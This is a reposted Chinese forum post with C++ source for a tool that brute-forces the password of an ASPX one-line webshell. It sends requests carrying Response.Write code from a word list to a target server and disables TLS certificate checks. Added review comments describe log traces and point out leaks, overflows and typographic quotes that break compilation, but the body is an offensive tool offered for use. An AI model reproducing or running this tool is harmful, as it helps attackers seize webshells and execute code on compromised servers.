
(转)ASPX一句话爆破工具

// Command-line client that reads candidate parameter names from a word list
// and sends one HTTPS GET per line to a fixed host and path, reporting the
// first candidate whose response body contains "ok".
//
// Traces visible from the code, useful when reviewing web-server or proxy logs:
//   - User-Agent "HttpClient 1.0" (the agent string passed to WinHttpOpen)
//   - GET over TLS to INTERNET_DEFAULT_HTTPS_PORT
//   - query string of the form <candidate>=Response.Write("ok");Response.End()
//     where only the parameter name changes from one request to the next
//   - a new WinHTTP session and connection handle is created for every candidate
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include <string.h>
#include <string>
#include <winhttp.h>
#pragma comment(lib,"winhttp.lib")

// Prints the two-line program banner to stdout.
void banner() // show the banner
{
	printf("[-]:Webshell Aspx crack T00ls\r\n[-]:Welcome www.90sec.org\r\n");
}

// Entry point. Usage (from the usage line below): <exe> Host Domain_Url Password_List
//   argv[1]  host name handed to WinHttpConnect
//   argv[2]  request path placed before the '?' in the request URL
//   argv[3]  word-list file, opened in binary mode and read one line at a time
// Returns 0 on every path, errors and success alike.
// NOTE(review): argv is used as wide strings (LPCWSTR, _wfopen), so this
// presumably expects a UNICODE build where _TCHAR is wchar_t - confirm.
int _tmain(int argc, _TCHAR * argv [])
{
	DWORD dwsize = 0;
	LPSTR pszOutBuffer;
	LPBYTE lpHeader, lpData; // lpData is declared but never used in this function
	// NOTE(review): argv[1] and argv[2] are read here, before the argc check
	// below; with fewer arguments argv[2] lies past the end of the argument vector.
	LPCWSTR Host = argv[1];
	LPCWSTR Url = argv[2];
	char buf[MAX_PATH] = {0}; // receives each line read by fgets
	FILE* fp;
	int i = 0; // running count of candidates tried, printed as "Line:"
	if (argc < 4) // fewer than four arguments: print usage and stop
	{
		banner();
		printf("[-]:%S Host Domain_Url Password_List\r\n",argv[0]);
		return 0;
	}
	if ((fp = _wfopen(argv[3],L"rb")) == NULL) // open the word list; bail out if it cannot be opened
	{
		printf("File not found\r\n"); // report the error
		return 0;
	}
	// NOTE(review): fp is never closed on any path.
	while ((fgets(buf,MAX_PATH,fp))) // author's note: fgets keeps the line ending; this cost the author an evening
	{
		// Overwrites the second-to-last character, which the author takes to be
		// the carriage return of a CRLF line ending.
		// NOTE(review): when the line holds fewer than two characters the index
		// wraps and the write lands outside buf.
		// NOTE(review): the quotes around \0 are typographic quotes from the page
		// rendering; a compiler needs ASCII single quotes here.
		buf[strlen(buf) - 2] = ‘\0‘; // replace the second-to-last character (the carriage return)
		// Everything down to the closing brace of this loop runs once per line,
		// so each candidate gets its own session, connection and request handle.
		HINTERNET Hinternet = WinHttpOpen(L"HttpClient 1.0", // create the WinHTTP session; the string is the User-Agent
			WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
			WINHTTP_NO_PROXY_NAME,
			WINHTTP_NO_PROXY_BYPASS,0);
		if (Hinternet == NULL) // session could not be created
		{
			printf("Failed to Initialize http sessions\r\n");
			return 0;
		}
		HINTERNET Hconnect = WinHttpConnect(Hinternet, // set up the connection
			Host, // target host
			INTERNET_DEFAULT_HTTPS_PORT,// default HTTPS port (443 per the author)
			0);
		if (Hconnect == NULL) // connect failed: close the session handle
		{
			printf("Hconnect error\r\n");
			WinHttpCloseHandle(Hinternet);
			return 0;
		}
		// The author's comment calls this "releasing" memory; the line allocates it.
		// NOTE(review): res is allocated on every iteration and never freed (the
		// delete[] at the end of the function is commented out).
		WCHAR* res = new WCHAR[MAX_PATH + 1]; // allocate the buffer for the request URL
		// NOTE(review): wsprintf writes into the fixed MAX_PATH + 1 WCHAR buffer with
		// no length check on Url or buf; a long path or line overruns res.
		wsprintf(res,L"%s?%S=Response.Write(\"ok\");Response.End()",Url,buf); // build "<Url>?<candidate>=<fixed value>"
		HINTERNET Hrequest = WinHttpOpenRequest(Hconnect, // prepare the request
			L"GET",
			res,
			L"HTTP /1.1",
			WINHTTP_NO_REFERER,
			WINHTTP_DEFAULT_ACCEPT_TYPES,
			WINHTTP_FLAG_SECURE|WINHTTP_FLAG_REFRESH);
		if (Hrequest == NULL)
		{
			WinHttpCloseHandle(Hinternet);
			WinHttpCloseHandle(Hconnect);
			return 0;
		}
		// NOTE(review): the return value of WinHttpQueryOption is ignored; if the
		// call fails dwFlags is used uninitialised below.
		DWORD dwFlags;
		DWORD dwBuffLen = sizeof(dwFlags);
		WinHttpQueryOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, // read the current security flags
			(LPVOID)&dwFlags, &dwBuffLen);
		// These four flags switch off certificate validation for the request:
		// unknown CA, expired or not-yet-valid date, host-name mismatch and wrong
		// key usage are all accepted, so the server identity is not authenticated.
		dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
		dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
		dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;
		dwFlags |= SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
		WinHttpSetOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, // write the flags back
			&dwFlags, sizeof (dwFlags) );
		if (WinHttpSendRequest(Hrequest, // send the request: no extra headers, no body
			WINHTTP_NO_ADDITIONAL_HEADERS,0,
			WINHTTP_NO_REQUEST_DATA,0,0,0) == FALSE)
		{
			DWORD err  = GetLastError(); // captured but never reported
			WinHttpCloseHandle(Hrequest);
			WinHttpCloseHandle(Hconnect);
			WinHttpCloseHandle(Hinternet);
			return 0;
		}
		if (WinHttpReceiveResponse(Hrequest,NULL) == FALSE) // wait for the response
		{
			DWORD err = GetLastError(); // captured but never reported
			WinHttpCloseHandle(Hrequest);
			WinHttpCloseHandle(Hconnect);
			WinHttpCloseHandle(Hinternet);
			return 0;
		}
		DWORD dwSize = 0;
		// A failure here is only printed; execution continues with dwSize as it is.
		if (!WinHttpQueryDataAvailable( Hrequest, &dwSize)) // ask how much response data is available
			printf( "Error %u in WinHttpQueryDataAvailable.\n",
			GetLastError());
		// First call passes no buffer so that dwsize receives the size needed for
		// the raw headers; the second call fills the buffer. The headers are freed
		// right away without being inspected.
		// NOTE(review): the HeapAlloc result is not checked before it is used.
		WinHttpQueryHeaders(Hrequest, // query the HTTP response headers
			WINHTTP_QUERY_RAW_HEADERS_CRLF,
			WINHTTP_HEADER_NAME_BY_INDEX,NULL,
			&dwsize,WINHTTP_NO_HEADER_INDEX);
		lpHeader = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, dwsize);
		WinHttpQueryHeaders(Hrequest,
			WINHTTP_QUERY_RAW_HEADERS_CRLF,
			WINHTTP_HEADER_NAME_BY_INDEX,
			lpHeader, &dwsize,
			WINHTTP_NO_HEADER_INDEX);
		HeapFree(GetProcessHeap(), 0, lpHeader);
		DWORD dwDownloaded = 0;
		// NOTE(review): with the default throwing operator new this null check never
		// fires, and even when it does the code carries on into ZeroMemory.
		// NOTE(review): a fresh buffer is allocated on every iteration, but only the
		// last one is released, after the loop.
		pszOutBuffer = new char[dwSize+1];
		if (!pszOutBuffer)
		{
			printf("Out of memory\n");
		}
		ZeroMemory(pszOutBuffer, dwSize+1); // zero-fill, so the body read below stays NUL-terminated
		// Reads at most dwSize bytes, i.e. a single chunk of the body.
		if (!WinHttpReadData( Hrequest, (LPVOID)pszOutBuffer,
			dwSize, &dwDownloaded))
		{
			printf( "Error %u in WinHttpReadData.\n", GetLastError());
		}
		// Success is decided solely by the substring "ok" appearing in the chunk
		// that was read.
		if (strstr(pszOutBuffer,"ok"))
		{
			printf("Line:%d-->Find password Success:%s\n",++i,buf);
			// NOTE(review): returns with the three handles, res and pszOutBuffer still open/allocated.
			return 0;
		}else
		{
			printf("Line:%d-->password Not found:%s\n",++i,buf);
		}
		// NOTE(review): Hrequest, Hconnect and Hinternet are not closed before the
		// next iteration, so handles accumulate with every candidate tried.
	}
	// NOTE(review): pszOutBuffer is uninitialised if the loop body never ran
	// (empty word list), so this delete[] would act on an indeterminate pointer.
	delete[] pszOutBuffer;
	//delete[] res;   (left disabled by the author; res is scoped to the loop body and not visible here)
	return 0;
}

 

(转)ASPX一句话爆破工具